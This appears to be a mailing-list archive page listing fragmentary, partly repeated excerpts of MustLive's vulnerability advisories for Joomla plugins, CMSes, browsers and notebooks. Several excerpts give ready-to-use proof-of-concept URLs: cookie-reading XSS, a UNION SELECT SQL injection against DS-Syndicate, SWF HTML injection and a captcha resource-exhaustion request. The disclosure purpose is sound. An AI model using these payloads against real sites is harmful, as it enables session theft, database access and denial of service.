
Cross-Site Scripting vulnerability in Mango

XSS:

http://site/archives.cfm/search/?term=%3Cbody%20onload=alert(document.cookie)%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Cross-Site Scripting vulnerability in JVClouds3D for Joomla

Vulnerable are JVClouds3D 1.0.9b and previous versions.

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3839/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Re: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers

> attack is
> going without blocking, only resource consumption (more slowly than in
> other browsers). And also this exploit must work in SeaMonkey, Internet
> Explorer 7 and other browsers.
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>

[Suspected Spam]New vulnerabilities in CMS SiteLogic

Command Execution:

It's possible to upload arbitrary files (shell upload) via module “Banner 
system” in admin panel.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Re: Insufficient Authentication vulnerability in Acer notebooks

>> 2413LC and potentially other models.
>>
>> I mentioned this vulnerability at my site
>> (http://websecurity.com.ua/3127/).
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>
>>

Re: Vulnerability in CB Captcha for Joomla and Mambo

Second, this attack is directed at the site. This hole doesn't belong to
Client-side Attacks (TC v.1), but to Logical Attacks (TC v.1) and is used
against the site itself. And it can be used for different malicious actions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Re: Vulnerability in CB Captcha for Joomla and Mambo Apr 16 2010 02:04PM

New vulnerabilities in plugin DS-Syndicate for Joomla

http://site/index2.php?option=ds-syndicate&version=1&feed_id=-1+union+select+1,0x436F6465,0x436F6465,1,1,0x436F6465,1,1,1,1,1,1,1,1,1,1,1,0x436F6465,1,1%23/../../../../1

Note that the developer of the plugin doesn't support it anymore, so users of the
plugin need to fix it themselves.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Vulnerability in Joomulus for Joomla

Vulnerable are Joomulus 2.0 and previous versions.

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3801/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Re: DoS vulnerability in Internet Explorer

Thanks for the information.

Did you click on the link? Because in IE7 DoS began after the click.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 

Vulnerabilities in VXDate for Joomla

http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Vulnerable are potentially all versions of VXDate.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



DoS vulnerability in Internet Explorer

versions too).

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3658/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Re: DoS vulnerability in Internet Explorer

versions too).

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3658/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



RE: DoS vulnerability in Google Chrome

potentially next versions too).

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3435/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Re: Insufficient Authentication vulnerability in Acer notebooks

> 2413LC and potentially other models.
> 
> I mentioned this vulnerability at my site
> (http://websecurity.com.ua/3127/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua 
> 
> 

DoS vulnerabilities in Firefox, Internet Explorer, Opera and Chrome

is only Chrome 2.x.

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3338/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Vulnerabilities in Sebo - webstore

http://site/libs/captcha/CaptchaSecurityImages.php?width=1000&height=9000

By setting large values of width and height it's possible to create
a large load on the server.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



DoS vulnerability in Google Chrome

potentially next versions too).

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3435/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Insufficient Anti-automation and Denial of Service vulnerabilities in multiple systems

Affected products: HoloCMS 1.3.1, 3.1 and previous versions, GunCMS,
PhoenixCMS PHP Edition, Baboh Emulator, CoreCMS, Holograph Emulator,
Holograph Emulator - Craigs Edition, 0niCMS, AJ-CMS, HoloCMS v3.2.0 Synergy,
HoloCMSrW, Mir, Alexx Hotel.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Vulnerability in widget Cumulus for BlogEngine.NET

HTML Injection:

http://site/Blog/widgets/Cumulus/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



DoS vulnerabilities in Mozilla Firefox, Internet Explorer and Chrome

potentially next versions).

I mentioned these vulnerabilities at my site
(http://websecurity.com.ua/3424/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Cross-Site Scripting vulnerability in 3D Cloud for Joomla

Vulnerable are 3D Cloud 1.3 and previous versions.

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3883/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Vulnerability in 3D user cloud for Joomla

http://site/modules/mod_cbusr3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/modules/mod_usr3dcloud/tagcloud_rus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Vulnerabilities in DS-Syndicate for Joomla

plugin need to fix it by themselves.

Just after disclosure of these vulnerabilities, I also found new
vulnerabilities in DS-Syndicate which I wrote about in a separate advisory.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua



Re: Vulnerability in CB Captcha for Joomla and Mambo

>>> provided to developers. Everyone who wants can create such a PoC from the
>>> exploit provided in the above-mentioned article from the MoBiC project.
>>>
>>> Best wishes & regards,
>>> MustLive
>>> Administrator of Websecurity web site
>>> http://websecurity.com.ua
>>>
>>>

Insufficient Authentication vulnerability in Acer notebooks

2413LC and potentially other models.

I mentioned this vulnerability at my site
(http://websecurity.com.ua/3127/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Vulnerabilities in eSitesBuilder

http://site/ru/contacts/index.html

In the registration form and in the contact form there is no protection from
automated requests (captcha).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Re: wordpress plugins WP Super Cache v0.8.3 Remote File Inclusion Vulnerability

Cru3l.b0y, please always check all vulnerabilities which you find. As I
already said to the author of the fake vulnerability in WordPress Plugin Related
Sites 2.1 (http://websecurity.com.ua/3281/), there is no need to litter the security
space on the Internet with non-working vulnerabilities.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

> Cru3l.b0y (cru3l b0y gmail com)

Re: Insufficient Authentication vulnerability in Asus notebook

>> ).
>>
>> Now I'm continuing to investigate this situation. If you find such a
>> case in your notebook or in a desktop PC, then inform me by email.
>>
>> Best wishes & regards,
>> MustLive
>> Administrator of Websecurity web site
>> http://websecurity.com.ua
>>


Re: [Suspected Spam]DoS vulnerabilities in Firefox, Internet Explorer, Chrome and Opera

> nntp-client, Opera in particular. And in Opera the attack is going without
> blocking, only resource consumption (more slowly than in other browsers).
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>

Multiple vulnerabilities in XAMPP (advisories #5 and #6)

Vulnerable are XAMPP 1.6.8 and previous versions. And potentially next
versions (including last version XAMPP 1.7.1).

-----------------------------

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
